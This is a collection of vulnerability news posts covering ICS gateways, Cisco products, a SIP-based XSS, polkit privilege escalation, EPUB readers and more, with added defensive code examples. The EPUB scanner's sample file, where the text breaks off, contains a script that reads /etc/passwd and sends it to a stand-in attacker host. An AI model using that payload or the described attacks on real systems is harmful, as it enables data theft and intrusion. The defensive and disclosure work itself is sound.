
Six Major Flaws Identified in Schneider PowerLogic Devices


Earlier this month, Schneider Electric, a global supplier of energy and automation digital solutions, published a security advisory for its customers disclosing six major flaws in its PowerLogic EGX100 and EGX300 communication gateways. Threat actors can exploit these security holes to access devices, launch denial-of-service (DoS) attacks, and execute code remotely.

Five of the six security holes have been rated high severity. They can be exploited for DoS attacks or remote code execution using specially crafted HTTP requests. The sixth flaw is related to the password recovery mechanism and can be exploited to gain administrator-level access to a device.

Jake Baines, a principal industrial control vulnerability analyst at industrial cybersecurity firm Dragos, identified the flaws, which are tracked as CVE-2021-22763 through CVE-2021-22768. The flaws were identified in EGX devices, but Schneider has determined that two of them also affect PowerLogic PM55xx power metering devices because the products share web server code. The affected devices are part of the company's power monitoring and control offering, but they have reached end of life.

“For example, CVE-2021-22763 is a backdoor account that gives full admin access to the device's web server. As long as the attacker can reach the server, and knows the device's ethernet address, they have full administration rights to the device. Although, this is largely only useful to an attacker to block access to the connected serial devices, so the true impact of the attack is dependent on the connected devices. CVE-2021-22764 is a similar situation. A remote and unauthenticated adversary can send HTTP requests that will cause the device to block access to the connected serial devices,” Baines said, describing a few theoretical scenarios in which the vulnerabilities could be exploited.

“The more interesting, but more complicated are the vulnerabilities scored 9.8. These all allow an unauthenticated and remote attacker to run arbitrary code on the device. The vulnerabilities are stack-based buffer overflows, so writing a full exploit would take effort. While it's possible that could happen, it's unlikely that it actually has or ever will. However, the ability to run code on the device is interesting because it would allow the adversary to alter communication between the connected serial device and the monitoring/control systems,” he further described.

PowerLogic EGX100 and EGX300 devices have reached end of life and are no longer supported. Users can either replace the products or apply the mitigations recommended by the vendor to minimize the risk of exploitation.

Cisco Smart Switches Detected with Vulnerabilities


A researcher has uncovered several vulnerabilities in Cisco's Small Business 220 Series smart switches, including some rated high severity. On Monday, the networking giant advised its customers that patches for these vulnerabilities are available.

The vulnerabilities affect switches running firmware versions earlier than 1.2.0.6 with the web-based management interface enabled.

Cisco Systems, Inc. is a US conglomerate based in San Jose, California, in the heart of Silicon Valley. Cisco designs, manufactures and sells networking hardware, software, telecommunications equipment, and other high-tech products and services.

The vulnerabilities were identified by security researcher Jasper Lievisse Adriaanse, who discovered four security holes in the small business switches, according to an advisory published by Cisco.

One of them, tracked as CVE-2021-1542 and rated high severity, can be used by a remote, unauthenticated attacker to hijack a user session and gain access to a switch's web portal. Depending on the privileges of the targeted user, the attacker could obtain administrative access to the management interface.

Another high-severity problem, CVE-2021-1541, enables a remote attacker with admin-level access to the device to execute arbitrary commands with root privileges on the underlying operating system.

The two other weaknesses identified by the researcher, both rated medium severity by Cisco, could allow a remote attacker to launch XSS (CVE-2021-1543) or HTML injection attacks (CVE-2021-1571).

“[In the case of the] XSS flaw, the vector which I tested and verified was by exploiting a vulnerability in how certain packets which are only valid on the same L2 domain are parsed,” Adriaanse explained. 

He added, “It should be possible, if you’re on the same L2 domain, to perform the XSS attack through CVE-2021-1543, obtain the CSRF token and perform arbitrary actions as the logged-in user. As I don’t write a lot of Javascript I didn’t attempt to write a payload to subsequently exploit CVE-2021-1541. Note however that due to lacking Content-Security-Policy headers you can use CVE-2021-1543 to include remote Javascript code. So you’re not limited by the packet size of the abused L2 protocol. I guess with enough experience and determination one could concoct a payload to do anything in the UI.” 

The XSS flaw is caused by insufficient validation of user-submitted input by the device's web-based management interface. An attacker could exploit it by convincing a victim to click a malicious link and access a specific page, which would allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.

The HTML injection vulnerability is caused by insufficient checks on parameters passed to the affected pages. Cisco has published software updates to address these vulnerabilities.

SIP Protocol Exploited to Trigger XSS Attacks via VoIP Call Monitoring Software


According to new research, the SIP communications protocol can be exploited to conduct cross-site scripting (XSS) attacks.

In a blog post published on June 10, Enable Security's Juxhin Dyrmishi Brigjaj explained that the Session Initiation Protocol (SIP), the technology used to set up communication across services such as Voice over IP (VoIP), video, and instant messaging, can be used as a conduit for application-level attacks on software that processes it.

This includes cross-site scripting (XSS) attacks, in which users' browser sessions may be stolen, same-origin restrictions may be bypassed, and users may be impersonated for objectives such as theft, phishing, or malware deployment.

In the worst-case situation, according to Dyrmishi Brigjaj, this might lead to an "unauthenticated remote compromise of vital systems." 

The study looked into the case of VoIPmonitor, an open-source network packet sniffer that system administrators use to examine the quality of VoIP calls based on various network metrics. During an offensive security audit, a flaw in the software's graphical user interface (GUI) was uncovered. 

One of the GUI's functions is monitoring SIP REGISTER requests from devices. The monitoring view also shows the type of device that submitted the SIP REGISTER message, taken from the request's User-Agent header value. Because that value is written into the DOM of the administrator's web browser, an attacker who controls it can inject script that runs in the administrator's session.

The researcher notes, “At face value, this might not seem like much, and in the real world I’d use something less obvious, relying on some canary token or callback. However, keep in mind that this code is executed in an administrator’s browser and is stored there for a period of time.”

According to Brigjaj, code execution during this brief window of opportunity can result in privilege escalation and full, permanent admin access.

This would be accomplished by creating an administrator account in the system and storing a new JavaScript payload. 

As a result, the vulnerability could result in data and traffic exfiltration, the hijacking of other administrator accounts, and the deployment of malware such as keyloggers, backdoors, and more. 

On February 10, Enable Security reported its findings to VoIPmonitor, and the project's developers fixed the security issue on February 22 by adding new XSS mitigation measures. 

Users of VoIPmonitor are advised to upgrade to the most recent version, v.24.71. Enable Security tested the fix and determined that the avenue to the XSS attack vector had been eliminated.
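The pattern behind the VoIPmonitor finding, as an added example that is not Enable Security's or VoIPmonitor's code: a SIP REGISTER request is parsed, its User-Agent value is extracted, and the value is rendered into an HTML cell first the vulnerable way (raw concatenation) and then the hardened way (HTML-escaped). The REGISTER message, addresses and the `probe()` marker are constructed for the example.

```python
"""Added example: why a SIP User-Agent header must be escaped before a
monitoring GUI renders it. Not code from VoIPmonitor or Enable Security."""
import html
import re

# Constructed SIP REGISTER: a "phone" whose User-Agent carries markup instead
# of a product name. Domain, IP and Call-ID are placeholders.
SAMPLE_REGISTER = (
    "REGISTER sip:pbx.example.invalid SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bKexample\r\n"
    "From: <sip:1001@pbx.example.invalid>;tag=abc\r\n"
    "To: <sip:1001@pbx.example.invalid>\r\n"
    "Call-ID: example-call-id@192.0.2.10\r\n"
    "CSeq: 1 REGISTER\r\n"
    "User-Agent: <script>probe()</script>\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)


def parse_sip_headers(message: str) -> dict:
    """Return the request's headers as {lower-case name: value}.

    Only the header block matters here: everything up to the first empty
    line, minus the request line. Folded or repeated headers are not
    handled; this is a teaching parser, not a full RFC 3261 one."""
    head = message.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def render_unsafe(user_agent: str) -> str:
    """The vulnerable pattern: untrusted SIP data dropped straight into HTML.

    Whatever the device (or whoever spoofs one) sent becomes part of the
    page shown to the administrator, so a <script> here runs in their browser."""
    return f'<td class="ua">{user_agent}</td>'


def render_safe(user_agent: str) -> str:
    """The hardened pattern: escape on output so markup is displayed, not
    interpreted. quote=True also neutralises attribute-breaking quotes."""
    return f'<td class="ua">{html.escape(user_agent, quote=True)}</td>'


_TAG = re.compile(r"<\s*/?\s*[a-z][a-z0-9-]*", re.IGNORECASE)


def inner_has_tag(cell: str) -> bool:
    """Does the cell content (between the <td ...> and </td>) still contain
    an HTML tag? Used to contrast the two renderers."""
    inner = cell[cell.index(">") + 1 : cell.rindex("</td>")]
    return _TAG.search(inner) is not None


if __name__ == "__main__":
    ua = parse_sip_headers(SAMPLE_REGISTER)["user-agent"]
    print("unsafe:", render_unsafe(ua), "| tag survives:", inner_has_tag(render_unsafe(ua)))
    print("safe:  ", render_safe(ua), "| tag survives:", inner_has_tag(render_safe(ua)))
```

The same escaping belongs on every SIP-derived field the GUI displays (From, To, Contact, Call-ID), not just User-Agent.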

Three Unpatched Bugs Spotted in Third-Party Provisioning Platform


Researchers at Rapid7 have unearthed three highly critical security flaws in Akkadian Provisioning Manager, a third-party provisioning tool used within Cisco Unified Communications environments, that can be chained together to achieve remote code execution (RCE) with elevated privileges.

Cisco’s UC suite provides VoIP and online video communications across enterprise footprints. The Akkadian products are tools generally used in large enterprises to help manage the process of provisioning and configuring all of the UC clients and scenarios through automation.

The flaws, present in version 4.50.18 of the Akkadian product, are as follows: 

•CVE-2021-31579: Use of hard-coded credentials (ranking 8.2 out of 10 on the CVSS vulnerability-severity scale)

•CVE-2021-31580 and CVE-2021-31581: Improper neutralization of special elements used in an OS command (via the exec and vi commands, respectively; ranking 7.9) 

•CVE-2021-31582: Exposure of sensitive information to an unauthorized actor (ranking 7.9)

Combining CVE-2021-31579 with either CVE-2021-31580 or CVE-2021-31581 allows an unauthorized adversary to obtain root-level shell access to affected equipment, according to Rapid7. That makes it straightforward to install cryptominers, keystroke loggers, persistent shells, and any other form of Linux-based malware. 

CVE-2021-31582 allows an attacker who is already authenticated to the appliance to alter or delete the contents of the local MariaDB database, a free and open-source fork of the MySQL relational database management system. In some cases, attackers could recover the LDAP BIND credentials in use in the host organization, which are used to authenticate clients (and the users or applications behind them) to a directory server. 

“In addition to these issues, two other questionable findings were discovered: The ability to read the cleartext local MariaDB credentials, and the inadvertent shipping of an entire GitHub repo with commit history. At the time of this writing, it’s unclear if these findings present unique security issues, but should be reviewed by the vendor,” the company explained, in a blog post this week. 

Security recommendations for organizations 

To protect their environments, organizations should restrict network access to the SSH port (22/tcp) so that only trusted users can connect, and disable any internet-facing connectivity, Rapid7 advised.

“Furthermore, system operators should know that, in the absence of a fix, users who have access to the Akkadian Appliance Manager effectively have root shell access to the device, due to the second and third issues,” according to the assessment. 

Rapid7 disclosed the flaws to Akkadian in February, but despite multiple follow-ups there has been no response, according to Rapid7.

Facebook Messenger Rooms Exploit Bypasses Android Screen Lock Protection


As a result of a security flaw in Facebook's Messenger Rooms video chat function, attackers are able to gain access to a victim's private Facebook photographs and videos, as well as submit posts, from their locked Android screen. Messenger Rooms, Facebook's newest video conferencing service, allows up to 50 individuals to video chat at the same time. You can converse for as long as you want, and you don't need a Facebook account to join a room. 

Rooms calls, like Zoom calls, are not end-to-end encrypted. Unless you change your preferences, the room will be open to anybody you're friends with on Facebook when you create it; they'll not only be able to join, but they'll also see it at the top of their News Feed. According to a proof-of-concept video supplied to Facebook with the vulnerability report, a user's Facebook account may be compromised by inviting them to a Messenger Room, then calling and answering the call from the target device before tapping the chat function. 

Despite the fact that physical access to a victim's device is required, the assault could be carried out without the victim's smartphone or tablet being unlocked, earning Nepalese security researcher Samip Aryal a $3,000 bug bounty. 

Aryal's newest discovery was inspired by a similar Facebook Messenger flaw he discovered in October 2020, in which users' private saved videos and viewing history could be exposed during a Messenger call via the Watch Together function. That flaw, which could be exploited by an attacker with physical access to a locked Android smartphone, was patched along with other comparable flaws by requiring users to unlock their phones before using the affected features. 

The researcher, who was logged into a Facebook account through a desktop PC, hosted a Messenger Room and invited an account that was active on an Android device to join. After entering the room with the 'malicious' account, he called the victim's device from the 'invited users' section, and the target, screen-locked smartphone began ringing within seconds. “I then picked up the call and tried all previously known sensitive features like ‘watch together’, ‘add people’, etc. but all of them needed to first unlock the phone before using them,” said Aryal. 

The discovery came when the researcher saw a request in the top right-hand corner of the call screen to ‘chat' with other participants. “I found that I could access all private photos/videos on that device without even unlocking the phone, as well as submit posts by clicking on the ‘edit’ option for any media”, he said.

CyRC Identifies Three Major DoS Flaws in Popular Open Source Message Brokers


Synopsys Cybersecurity Research Centre (CyRC) has warned organizations of easily triggered denial-of-service (DoS) vulnerabilities in three widely used open-source message brokers: RabbitMQ, EMQ X, and VerneMQ. 

A message broker is software that enables applications, systems, and services to communicate with each other and exchange information by translating messages between formal messaging protocols. Message brokers are also used to manage IoT devices such as smart home hubs and door locks via a common protocol, Message Queuing Telemetry Transport (MQTT). 

MQTT, first released in 1999, is used for tasks ranging from monitoring oil pipelines to a variety of home and industrial automation. Any disruption in MQTT messaging could potentially leave users locked out of their homes and offices.

“Message brokers can be the nerve center of a complex system. If the message broker isn't working, then the various components of the system cannot communicate. Whatever services are provided by that system are unavailable until the message broker is restored,” Jonathan Knudsen, the researcher who identified the vulnerabilities, told SecurityWeek. 

Jonathan Knudsen identified that specially crafted MQTT messages can cause excessive memory consumption in RabbitMQ (owned by VMware), EMQ X, and VerneMQ, leading to the operating system terminating the application.

“These vulnerabilities can be exploited by any system that has access to the message broker. The broker can be configured to require authentication or refuse connections from unrecognized endpoints which would limit external attacks. But for an attacker with access to one of the vulnerable message brokers, the vulnerabilities can be exploited simply by delivering a badly formed network packet, which can be done with a very simple script,” Knudsen explained.

According to EMQ, its message broker has been installed more than 2 million times and it has over 5,000 users globally. RabbitMQ claims to have tens of thousands of users, including small startups and large enterprises. VerneMQ is used by companies such as Microsoft, Volkswagen, Siemens, and Swisscom.

Knudsen and CyRC privately disclosed the flaws to the project maintainers back in March, and all three have now been patched. RabbitMQ users are advised to upgrade to version 3.8.16 or above; EMQ X users to version 4.2.8 or above, and VerneMQ users to version 1.12.0 or above.

GitHub Releases Key Findings of an Easy-to-Exploit Linux flaw


Kevin Backhouse, a researcher at GitHub Security Lab, revealed the details of an easy-to-exploit Linux flaw that can be used to escalate privileges to root on the targeted system. The vulnerability, classified as highly critical and tracked as CVE-2021-3560, affects polkit, a system service installed by default on many Linux distributions.

On Thursday, Backhouse published a blog post explaining his findings, as well as a short video demonstrating the exploit against polkit. A local, unprivileged attacker can use the flaw to escalate privileges to root with only a few commands executed in the terminal. 

The vulnerability impacts some versions of Red Hat Enterprise Linux, Fedora, Debian, and Ubuntu. A patch for CVE-2021-3560 was released on June 3. 

“The bug I found was quite old. It was introduced seven years ago in commit bfa5036 and first shipped with polkit version 0.113. However, many of the most popular Linux distributions didn’t ship the vulnerable version until more recently,” Backhouse stated.

“The bug has a slightly different history on Debian and its derivatives (such as Ubuntu) because Debian uses a fork of polkit with a different version numbering scheme. In the Debian fork, the bug was introduced in commit f81d021 and first shipped with version 0.105-26. The most recent stable release of Debian, Debian 10 (“buster”), uses version 0.105-25, which means that it isn’t vulnerable,” Backhouse further added. 

Polkit is a system service developed for controlling system-wide privileges, creating a way for non-privileged processes to communicate with privileged processes. Backhouse described it as a service that plays the role of a judge, determining whether an action initiated by a user — specifically one that requires higher privileges — can be carried out directly or requires additional authorization, such as entering a password.

The vulnerability identified by the researcher is easy to exploit, requiring just a few commands in the terminal. However, because of its timing requirements, it normally takes a few attempts for the exploit to succeed.

CVE-2021-3560 allows an unprivileged local hacker to gain root privileges. It’s very simple and quick to exploit, so users must update their installations as quickly as possible. Any system that has polkit version 0.113 (or later) installed is vulnerable. That includes popular distributions such as RHEL 8 and Ubuntu 20.04.

Linux System Service Bug Allows You to Gain Root Access


An authentication bypass vulnerability in the polkit authorization system service, which is installed by default on many recent Linux distributions, allows unprivileged attackers to gain a root shell. On June 3, 2021, the polkit local privilege escalation flaw (CVE-2021-3560) was publicly disclosed and a fix was released. Polkit is used by systemd, hence it's included in any Linux distribution that uses systemd. 

Kevin Backhouse, a GitHub security researcher, detailed in a blog post on Thursday how he discovered the bug (CVE-2021-3560) in polkit. The problem, which was introduced in commit bfa5036 seven years ago and first shipped in polkit version 0.113, has a somewhat different history on each Linux distribution. Although many distributions did not ship the vulnerable polkit version until recently, any Linux machine with polkit 0.113 or later installed is vulnerable. 

Polkit, formerly known as PolicyKit, is a service that determines whether a Linux task requires more privileges than the requesting process currently has. It comes into play when you want to create a new user account, for example. According to Backhouse, exploiting the issue is shockingly simple, needing only a few commands using common terminal tools such as bash, kill, and dbus-send. 

"The vulnerability is triggered by starting a dbus-send command but killing it while polkit is still in the middle of processing the request," explained Backhouse. Killing dbus-send (an interprocess communication command) in the middle of an authentication request creates an error, because polkit asks for the UID of a connection that no longer exists. 

"In fact, polkit mishandles the error in a particularly unfortunate way: rather than rejecting the request, it treats the request as though it came from a process with UID 0," explains Backhouse. "In other words, it immediately authorizes the request because it thinks the request has come from a root process."

Because polkit's UID query to the dbus-daemon occurs numerous times throughout different code paths, this doesn't happen all of the time. According to Backhouse, those code pathways usually handle the error correctly, but one is vulnerable, and if the disconnection occurs while that code path is running, privilege escalation occurs. It's all about timing, which varies in unanticipated ways due to the involvement of various processes. Backhouse believes the bug's intermittent nature is why it went unnoticed for seven years.
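A triage helper for the version facts quoted in the two polkit posts above (upstream polkit from 0.113; the Debian fork, also used by Ubuntu, from 0.105-26, so Debian 10's 0.105-25 is unaffected). This is an added example, not polkit's or GitHub Security Lab's code. The page does not state the fixed package versions, so a True result means "this version line carries the bug; confirm a patched build against your distribution's advisory", not "definitely still vulnerable"; the sample version strings are constructed.

```python
"""Added example: does an installed polkit version line carry CVE-2021-3560?
Thresholds come from the posts above; fixed versions are NOT known here."""
import re

UPSTREAM_INTRODUCED = (0, 113)      # upstream release that first shipped commit bfa5036
DEBIAN_INTRODUCED = (0, 105, 26)    # Debian-fork package that first shipped commit f81d021

_VERSION_RE = re.compile(
    r"""
    ^\s*
    (?P<upstream>\d+(?:\.\d+)*)     # e.g. 0.113 or 0.105
    (?:-(?P<revision>\d+)           # optional package revision, e.g. -26
       (?P<suffix>\S*))?            # distro tail such as ubuntu1 or .el8 (ignored)
    \s*$
    """,
    re.VERBOSE,
)


def parse_version(version: str) -> tuple:
    """Split "0.113", "0.105-26" or "0.105-26ubuntu1" into
    (upstream tuple, revision); revision is None without a package revision."""
    m = _VERSION_RE.match(version)
    if not m:
        raise ValueError(f"unrecognised polkit version string: {version!r}")
    upstream = tuple(int(part) for part in m.group("upstream").split("."))
    revision = int(m.group("revision")) if m.group("revision") else None
    return upstream, revision


def shipped_with_bug(version: str, debian_fork: bool = False) -> bool:
    """True if this version line includes the vulnerable code.

    Pass debian_fork=True for Debian and its derivatives: their fork uses a
    different numbering scheme, and the bug arrived in a package revision
    (0.105-26) rather than in a new upstream release."""
    upstream, revision = parse_version(version)
    if debian_fork:
        # Compare (upstream, revision) as one tuple against 0.105-26.
        return upstream + ((revision if revision is not None else 0),) >= DEBIAN_INTRODUCED
    # Everyone else: only the upstream release number decides whether the
    # introducing commit is present; the package revision is irrelevant.
    return upstream >= UPSTREAM_INTRODUCED


def triage(version: str, debian_fork: bool = False) -> str:
    """One-line verdict suitable for an inventory report."""
    if shipped_with_bug(version, debian_fork):
        return f"{version}: carries the CVE-2021-3560 code; verify a fixed build is installed"
    return f"{version}: predates the bug (not affected)"


if __name__ == "__main__":
    # Constructed sample inventory (version strings are illustrative only).
    for v, fork in (("0.113", False), ("0.112", False), ("0.115-11.el8", False),
                    ("0.105-25", True), ("0.105-26ubuntu1", True)):
        print(triage(v, fork))
```

Feed it the version from `rpm -q polkit` or `dpkg -s policykit-1` style output; the regex ignores the distro suffix after the revision number.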

Major Security Flaw Patched by Hyperkitty


Hyperkitty, a Django-based application that provides the web archive interface for the popular open-source mailing list and newsletter management service Mailman, has patched a critical flaw that exposed private mailing lists while they were being imported.

Amir Sarabadani, a software engineer at Wikimedia Deutschland, identified the flaw while upgrading Wikimedia's mailing lists from Mailman 2 to Mailman 3.

“We were upgrading a test mailing list that was private but realized during the upgrade it was public. Once the upgrade was done, the list would become private. Private mailing lists can contain sensitive information, like publicly identifiable information,” Sarabadani stated. 

“When importing a private mailing lists archives, these archives are publicly visible for the duration of the import,” reads the security advisory on GitHub. This means a threat actor would be able to access the personal information of the users.

The flaw has been rated critical with a severity score of 7.5. The latest version of Hyperkitty fixes it by reading the privacy configuration of each imported list from Mailman instead of applying default settings. According to the GitHub advisory, upgrades from older versions of Mailman to version 3 can take more than an hour, which is how long the archives could remain exposed. 

According to Sarabadani the impact of the flaw depends on the mailing list and how large it is. “Private mailing lists can contain sensitive information, like publicly identifiable information. If you communicated publicly that mailing lists are being upgraded [at] certain dates and times as a maintenance window (which you would usually), an attacker can use the opportunity to extract as much private data as possible, especially since Hyperkitty allows you to download all of the archives in batch.” Sarabadani further added.

“Don’t take security for granted. A new software being deployed in your infra, no matter how mature, can still have rather major security issues.”

Recent research revealed that nearly 41 percent of executives do not practice open-source governance in their organizations, a troubling figure considering that open-source components underpin vast sections of enterprise applications and networks. The flaw in Hyperkitty caused a partially imported list to be marked as public regardless of its privacy setting in Mailman. 

WAGO Controller Flaws Can Allow Hackers to Interrupt Industrial Processes


According to Russian cybersecurity firm Positive Technologies, several vulnerabilities found in industrial controllers made by WAGO can be abused to disrupt technological processes, which in some cases could lead to industrial accidents. 

WAGO is a German company that manufactures components for electrical connections and electronic components for decentralized automation. 

The vulnerabilities were discovered in the WAGO PFC200 programmable logic controller (PLC), which the vendor has now addressed. One of the issues, tracked as CVE-2021-21001, has been defined as a path traversal issue involving a CODESYS component utilized by the device and is graded critical severity. 

It allows a network-connected attacker with elevated privileges to access the target device's file system by sending specially crafted packets. 

Vladimir Nazarov, head of ICS security at Positive Technologies explained, “By exploiting this vulnerability, attackers can access the controller file system with read and write rights. Changes in the PLC file system may cause disruption of technological processes and even lead to industrial accidents.” 

The second vulnerability, CVE-2021-21000, is a medium-severity problem that affects WAGO's iocheckd service, which is used to check PLC input/output and display the PLC configuration. This weakness can be exploited by an unauthenticated attacker with network access to the device to cause a DoS condition. 

“Exploitation may cause a sudden shutdown of the controller, and in turn interrupt technological processes,” Positive Technologies explained. 

These flaws, along with ten others uncovered by Positive Technologies in CODESYS industrial automation software, were disclosed by Germany's VDE CERT in May. 

The 10 CODESYS flaws, the majority of which were rated critical or high severity, affected ICS systems from more than a dozen vendors who use CODESYS software. 

The US government recently sanctioned Positive Technologies for allegedly assisting Russian intelligence agencies. However, the company stated that it will continue to responsibly disclose vulnerabilities discovered by its employees in major U.S. corporations' products.

Cisco Discovers High-Severity Flaws in its Software


The IT and networking giant Cisco has disclosed multiple vulnerabilities in its Webex, SD-WAN, and ASR 5000 products that could allow attackers to execute arbitrary code. 

Cisco has provided patches for a wide range of vulnerabilities, including updates for high-risk issues in the widely used Webex Player, SD-WAN, and ASR 5000 Series. 

A total of three high-severity flaws (CVSS score of 7.8) have been patched in Webex Player for Windows and macOS, two of which also affect the Webex Network Recording Player on those operating systems. 

The first bug, CVE-2021-1526, is a memory corruption issue that can be exploited to execute arbitrary code on a vulnerable computer. Specially crafted Webex Recording Format (WRF) files can trigger the vulnerability. 

The problem affects Cisco Webex Player for Windows and macOS releases prior to version 41.5 but does not affect the Webex Network Recording Player. 

The other two vulnerabilities, CVE-2021-1502 and CVE-2021-1503, are memory corruption problems that affect both the Webex Network Recording Player and Webex Player on Windows and macOS. 

Both can be used to arbitrarily execute code on the system concerned. Both of these issues are resolved in version 41.4 of Webex player and Webex Network Recording Player. 

Cisco also recently issued updates for SD-WAN software to address CVE-2021-1528, a high-risk bug (CVSS score of 7.8) that could be used to gain elevated privileges on a vulnerable system. It affects SD-WAN versions 20.4 and 20.5 (vBond Orchestrator, vEdge Cloud, vEdge Routers, vManage, and vSmart Controller) and has been addressed in SD-WAN versions 20.4.2 and 20.5.1. 

Cisco has also issued updates for several vulnerabilities in the ASR 5000 Series Software (StarOS) that could be leveraged to bypass authorization and execute CLI commands on an affected device. CVE-2021-1539 is the most significant of these defects (CVSS score of 8.1). 

Cisco urges customers to upgrade to each product's patched version as soon as possible. The company adds that it is not aware of these vulnerabilities being exploited in attacks. Cisco has also released information on other medium-risk vulnerabilities affecting its portfolio, including Webex Meetings, Webex Player, ThousandEyes Recorder, Video Surveillance 7000 Series IP cameras, and Common Services Platform Collector (CSPC). 

The company also noted that several vulnerabilities in the frame aggregation and fragmentation features of the 802.11 standards affect a number of its products. An attacker could abuse these defects to forge encrypted frames and exfiltrate sensitive device data.

Serious Flaws Identified in CODESYS Industrial Automation Software


Researchers at Russian cybersecurity firm Positive Technologies discovered as many as ten critical flaws in CODESYS automation software that could be exploited to achieve remote code execution on programmable logic controllers (PLCs). 

The firm initially discovered the vulnerabilities in a programmable logic controller (PLC) offered by WAGO, but further investigation revealed that the issues were actually introduced by CODESYS software, which is used by more than a dozen automation technology vendors including Beckhoff, Kontron, Moeller, Festo, Mitsubishi, HollySys and several Russian companies.

CODESYS provides a development environment for programming the controller applications used in industrial control systems. The German software company credited Vyacheslav Moskvin, Denis Goryushev, Anton Dorfman, Ivan Kurnakov, and Sergey Fedonin of Positive Technologies and Yossi Reuven of SCADAfence for identifying the vulnerabilities.

“To exploit the vulnerabilities, an attacker does not need to have a username or password; obtaining network access to the industrial controller is enough. The main cause of the vulnerabilities is insufficient verification of input data, which may itself be caused by failure to comply with secure development guidelines,” researchers from Positive Technologies stated.

Six of the most critical flaws were discovered in the CODESYS V2.3 web server component used by CODESYS WebVisu to visualize a human-machine interface (HMI) in a web browser. The flaws could be leveraged by an adversary sending specially crafted web server requests to trigger a denial-of-service condition, or to write or read arbitrary code to and from a control runtime system’s memory. 

All six flaws have been rated critical on the CVSS scale:

• CVE-2021-30189 – Stack-based Buffer Overflow 

• CVE-2021-30190 – Improper Access Control 

• CVE-2021-30191 – Buffer Copy without Checking Size of Input 

• CVE-2021-30192 – Improperly Implemented Security Check 

• CVE-2021-30193 – Out-of-bounds Write 

• CVE-2021-30194 – Out-of-bounds Read 

“Their exploitation can lead to remote command execution on the PLC, which could disrupt technological processes and result in industrial incidents and financial losses. The most infamous example of exploiting similar vulnerabilities is Stuxnet,” explained Vladimir Nazarov, Head of ICS Security at Positive Technologies. 

CODESYS has published an advisory for its CODESYS V2 web server, Runtime Toolkit, and PLCWinNT products to address the vulnerabilities. The company has published separate advisories for the critical, high, and medium-severity issues while recommending users to install the updates. 

Last month, the U.S. Treasury Department sanctioned Positive Technologies for allegedly supporting Kremlin intelligence agencies. The company has said it will continue to responsibly disclose flaws its employees find in the products of major U.S. firms.

Every tenth significant IT system in Russia is infected with malware

According to Rostelecom-Solar research, every tenth critical information infrastructure (CII) system in the Russian Federation is compromised by malware. Even low-skilled attackers are able to break into most of these IT networks: a significant share of the detected vulnerabilities have existed for more than 10 years, yet organizations have not remediated them.

Vladimir Drukov, director of the Cyber Attack Monitoring and Response Center at Rostelecom-Solar, attributes the presence of vulnerabilities in CII to the fact that regular software update processes have not yet been established in more than 90% of companies.

Kaspersky Lab experts agreed with the findings of the study. According to Anton Shipulin, Lead Business Development Manager at Kaspersky Industrial CyberSecurity, cybersecurity is still at a low level in most CII facilities.

"In terms of data protection, a large number of CII objects are currently in a "depressing situation", and there are no serious hacker attacks on them "by happy accident", but it is only a matter of time," added Fedor Dbar, Commercial Director of Security Code.

In addition, the number of hosts running vulnerable versions of the SMB protocol has almost doubled. SMB is a network protocol for sharing files, printers, and other network resources that is used in almost every organization. Such vulnerabilities are particularly dangerous because they allow attackers to run arbitrary code remotely without authentication, and so to infect every computer on the local network with malware.

The main problem inside internal networks is poor password management. Weak and dictionary passwords that let an attacker break into an organization's internal network are extremely common, and password guessing is used by amateur hackers and professional attackers alike.

Moreover, the pandemic has significantly weakened IT perimeters. Over the past year, the number of automated process control systems (APCS) reachable from the Internet has grown by more than 60%, which increases the risk of industrial espionage and cyber-terrorism.


Security Experts Unearthed the Flaws in EPUB Similar to Web Browsers

Security researchers at the imec-DistriNet Research Group have discovered vulnerabilities in e-book reading systems that allow an attacker to compromise a user's system through a specially crafted electronic publication (EPUB) file.

Security researchers Gertjan Franken, Tom Van Goethem, and Wouter Joosen published a research paper showing that e-book reading systems suffer from flaws similar to those of web browsers. The EPUB format relies primarily on XHTML and CSS (Cascading Style Sheets) to lay out e-books, and browser engines are often used to render their contents.

Unfortunately, none of the e-book reading systems the researchers examined properly followed the security guidelines in the EPUB specification. Using a semi-automated testbed, the researchers found that 16 of the 97 systems allowed an EPUB to leak information about the user's file system, and in eight cases to extract file contents. They warned that in some cases an attacker could go further and fully compromise the e-book reading system.
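Because an EPUB is a zip archive of XHTML documents that a browser engine renders, the same constructs that are dangerous in a web page (script elements, inline event handlers, javascript: URIs) are dangerous inside an e-book. The following is an added example, not code from the paper or from any reading system: a scanner that walks an EPUB the way a reader does (container.xml to the package document to the manifest) and flags scripting constructs in the content documents. The sample EPUB it builds is constructed for the example; its script is a sketch of a file-system leak, not real malware.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Namespaces of the EPUB container (OCF) and package (OPF) documents, and of XHTML.
NS_CONTAINER = "urn:oasis:names:tc:opendocument:xmlns:container"
NS_OPF = "http://www.idpf.org/2007/opf"
NS_XHTML = "http://www.w3.org/1999/xhtml"

JS_URI = re.compile(r"^\s*javascript:", re.I)


def build_sample_epub() -> bytes:
    """Constructed sample: a minimal EPUB whose single content document carries a
    <script> element, an inline event handler and a javascript: link."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        # The OCF spec requires "mimetype" to be the first entry and uncompressed.
        z.writestr(zipfile.ZipInfo("mimetype"), "application/epub+zip",
                   compress_type=zipfile.ZIP_STORED)
        z.writestr("META-INF/container.xml", f"""<?xml version="1.0"?>
<container version="1.0" xmlns="{NS_CONTAINER}">
  <rootfiles>
    <rootfile full-path="OEBPS/content.opf" media-type="application/oebps-package+xml"/>
  </rootfiles>
</container>""")
        z.writestr("OEBPS/content.opf", f"""<?xml version="1.0"?>
<package xmlns="{NS_OPF}" version="3.0" unique-identifier="uid">
  <metadata/>
  <manifest>
    <item id="ch1" href="chapter1.xhtml" media-type="application/xhtml+xml"/>
    <item id="css" href="style.css" media-type="text/css"/>
  </manifest>
  <spine><itemref idref="ch1"/></spine>
</package>""")
        z.writestr("OEBPS/style.css", "p { color: black; }")
        z.writestr("OEBPS/chapter1.xhtml", f"""<?xml version="1.0"?>
<html xmlns="{NS_XHTML}"><body>
  <p>Chapter one</p>
  <script>fetch("file:///etc/passwd").then(r => r.text()).then(t => fetch("https://attacker.example/?d=" + t));</script>
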